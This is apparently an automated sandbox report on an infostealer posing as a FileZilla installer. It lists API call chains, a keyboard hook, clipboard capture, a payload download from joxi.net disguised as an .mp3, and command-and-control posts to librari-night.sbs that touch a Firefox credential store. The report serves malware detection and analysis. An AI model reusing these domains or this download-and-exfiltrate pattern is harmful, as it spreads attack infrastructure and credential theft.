                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_00251280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task,11_2_00251280
                Source: global trafficHTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: joxi.net
                Source: global trafficDNS traffic detected: DNS query: processhol.sbs
                Source: global trafficDNS traffic detected: DNS query: librari-night.sbs
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: librari-night.sbs
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.45Set-Cookie: js=Kjb%2CqXNGWr6qO8OFFfuytA6GbIwRASKgxwp%2CaVFODg3IF0lCGlL3T5hb1EBsxkeemPHDsfJFog2LUGk4F%2C0iJ0; path=/Cache-Control: no-cacheDate: Fri, 22 Nov 2024 04:02:05 GMTVary: Accept-LanguageVary: Accept-LanguageContent-Encoding: gzipData Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d c9 02 f1 70 7b 87 06 d2 de f2 79 8b 6d f2 2d 5f 0f 83 c1 dc bf 7e 68 08 0d a9 36 b9 7b 06 e1 ee 0d 06 9b 5b 75 b7 e8 8a b8 46 78 d4 4d 69 26 45 fd 99 63 8c 89 bf 78 3d a3 3d b4 4e 24 ad d5 5b c4 17 6e c0 29 2c ee 26 54 03 6b 79 dd 99 d3 6a ea 14 10 11 95 53 b3 58 eb 6f 90 e8 01 49 29 00 37 9b 5b 2d e2 12 d1 cf 02 7f 11 fe 09 1e f8 51 2b 75 0b c2 81 e9 41 1e 52 97 65 82 72 b9 46 3b 39 a7 35 9d a6 e1 7e 56 af f5 58 16 e6 3d 27 cc 03 13 9f 63 57 35 b2 1d 1b e3 5e af e7 46 a6 14 0d 32 ab 85 1b e4 29 be 5c ed 08 40 46 c4 ae b7 aa 12 cf be 88 d4 ec 2a 1f db 41 f6 e3 d5 c6 8d e6 ad 95 e6 d2 cd 66 63 05 36 a0 2c 2d 03 d7 30 4e f7 ba 8c 1b 5c c8 44 91 90 7e 07 fc ba 9c 0a cd 3a 43 09 9a 85 1a 52 40 6b ec 33 da 33 27 7a 78 7a a3 1e 8e 8d 26 16 bc ed 3c ec 83 52 42 b6 8f 58 e8 5b 3d 4e 8a 82 f2 59 17 81 56 12 e8 0f df 4a f2 08 5a 70 da 96 56 db c3 64 da 67 f1 62 1b ba 06 35 b4 1a 86 d0 ea 95 5a ca 17 e5 91 51 ca 58 8d ca d7 5a 2b 63 75 a6 77 5f 96 6f a1 e9 c1 aa 4e 41 60 d0 fe 10 c9 e2 94 4a 14 24 6b ab 8f a0 9b ef 20 92 89 fa 06 4e 93 39 6f f9 4e fd b8 a2 35 d0 19 68 6a 34 97 17 52 27 80 3b af c4 3b 04 13 a8 0f c1 f0 45 13 9d 1a f9 7d 85 e5 79 f9 1e a2 3a 53 17 2e 54 44 9f 5a b5 3b b9 4c 50 1d 1b f0 e9 7f f2 b9 cc 7f ee d3 a1 34 dc 26 c1 ae d5 56 9f 20 f8 31 a4 38 84 87 e1 a8 7c 77 15 1c 4b 59 dc c6 d8 28 30 a3 12 83 90 a1 e1 f5 8b f4 74 3b 21 d9 ae 35 2b 7b 90 17 7d b8 0c 0d 44 bf 3f a3 a5 e6 d2 b2 61 f3 30 5c 98 9e a6 d7 87 cd 4b f7 17 32 0c 27 7f 00 05 Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ WI{b
                Source: Installer.exe.9.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: RegSvcs.exe, 0000000C.00000002.2319086151.0000000000C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
                Source: file.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                Source: file.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                Source: Installer.exe.9.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0t
                Source: file.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                Source: file.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                Source: Installer.exe.9.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#
                Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000000.2101759997.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe, 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe.9.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3
                Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp36U
                Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3S
                Source: Installer.exe, 0000000B.00000000.2101759997.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe, 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe.9.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPr
                Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3ouM
                Source: Installer.exe.9.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: file.exe, Installer.exe.9.drString found in binary or memory: http://ocsp.sectigo.com0
                Source: file.exeString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: RegSvcs.exe, 0000000C.00000002.2319143883.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/
                Source: RegSvcs.exe, 0000000C.00000002.2319143883.0000000000C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/=
                Source: RegSvcs.exe, 0000000C.00000002.2319086151.0000000000C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/api
                Source: RegSvcs.exe, 0000000C.00000002.2319745447.000000000346E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/apiAA==
                Source: RegSvcs.exe, 0000000C.00000002.2319143883.0000000000C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs/b
                Source: RegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs:443/api
                Source: RegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs:443/apihv.default-release/key4.dbPK
                Source: RegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://librari-night.sbs:443/apitPK
                Source: Installer.exe, 0000000B.00000002.2123014561.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000003.2122322581.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comg
                Source: file.exe, Installer.exe.9.drString found in binary or memory: https://sectigo.com/CPS0
                Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49736 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,000000000_2_00408DBB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00433CD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_00433CD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00433CD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_00433CD0

                System Summary

                barindex
                Source: file.bin.0.drZip Entry: encrypted
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002496AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,5_2_002496AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405BFC0_2_00405BFC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B0E00_2_0040B0E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B0E40_2_0040B0E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004199730_2_00419973
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A9000_2_0040A900
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2700_2_0040A270
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040AC200_2_0040AC20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409C200_2_00409C20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D4800_2_0040D480
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ED000_2_0040ED00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409DD00_2_00409DD0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004196010_2_00419601
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004196DB0_2_004196DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418F400_2_00418F40
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0026F13E5_2_0026F13E
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002654585_2_00265458
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002624C05_2_002624C0
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002647AC5_2_002647AC
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002888175_2_00288817
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00250DCC5_2_00250DCC
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0024B1145_2_0024B114
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0024F1B45_2_0024F1B4
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0025C2785_2_0025C278
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002835285_2_00283528
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002725785_2_00272578
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0027066E5_2_0027066E
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0026D66C5_2_0026D66C
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0025D8585_2_0025D858
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0026694C5_2_0026694C
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002849A55_2_002849A5
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002799B85_2_002799B8
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_002779DC5_2_002779DC
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0028DA305_2_0028DA30
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0027FA0C5_2_0027FA0C
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0028DC115_2_0028DC11
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00257C685_2_00257C68
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00258CA85_2_00258CA8
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0028DD005_2_0028DD00
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00266E085_2_00266E08
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00248F185_2_00248F18
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0025AF585_2_0025AF58
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025128011_2_00251280
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025542411_2_00255424
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025DA2011_2_0025DA20
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0026122C11_2_0026122C
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025DEB811_2_0025DEB8
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0026272D11_2_0026272D
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0026134C11_2_0026134C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0042480012_2_00424800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004412A012_2_004412A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043BB7012_2_0043BB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043931012_2_00439310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00441BF012_2_00441BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00422BA012_2_00422BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00420CD012_2_00420CD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040DCB712_2_0040DCB7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004195D112_2_004195D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00427E5012_2_00427E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040CEF512_2_0040CEF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00408F2012_2_00408F20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0042905E12_2_0042905E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040306012_2_00403060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0042987212_2_00429872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004418D012_2_004418D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040609012_2_00406090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041F09012_2_0041F090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004070A012_2_004070A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004400A012_2_004400A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040994012_2_00409940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040915012_2_00409150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0042F96012_2_0042F960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043897012_2_00438970
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00403A6012_2_00403A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00425A7512_2_00425A75
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040B22012_2_0040B220
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041BAE612_2_0041BAE6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041B2F012_2_0041B2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00439AF012_2_00439AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041CA8012_2_0041CA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043FB7012_2_0043FB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043CB0012_2_0043CB00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043C31012_2_0043C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041AB3B12_2_0041AB3B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00427BEB12_2_00427BEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0042A3F012_2_0042A3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041C3FA12_2_0041C3FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00407BB012_2_00407BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040444012_2_00404440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00406C1012_2_00406C10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00428C3F12_2_00428C3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00402CC012_2_00402CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041FC8012_2_0041FC80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040655012_2_00406550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00409DC012_2_00409DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040ADE012_2_0040ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004415B012_2_004415B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043FB7012_2_0043FB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040B6E012_2_0040B6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00424EE012_2_00424EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041A6A312_2_0041A6A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00420EA012_2_00420EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041DF6012_2_0041DF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041F71012_2_0041F710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043871012_2_00438710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004237C012_2_004237C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043FFD012_2_0043FFD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00404F8F12_2_00404F8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004277BD12_2_004277BD
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 004029A6 appears 44 times
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: String function: 00252330 appears 36 times
                Source: file.exeStatic PE information: invalid certificate
                Source: file.exe, 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefilezilla.exe6 vs file.exe
                Source: file.exe, 00000000.00000003.2087206791.0000000002670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.exe, vs file.exe
                Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.exe, vs file.exe
                Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs file.exe
                Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.dll, vs file.exe
                Source: file.exe, 00000000.00000003.2084038077.0000000002790000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                Source: file.exe, 00000000.00000003.2084038077.0000000002790000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs file.exe
                Source: file.exe, 00000000.00000003.2084038077.0000000002790000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.dll, vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenamefilezilla.exe6 vs file.exe
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/17@3/2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00409606
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0024AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_0024AC74
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00251D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,5_2_00251D04
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040122A GetDiskFreeSpaceExW,SendMessageW,0_2_0040122A
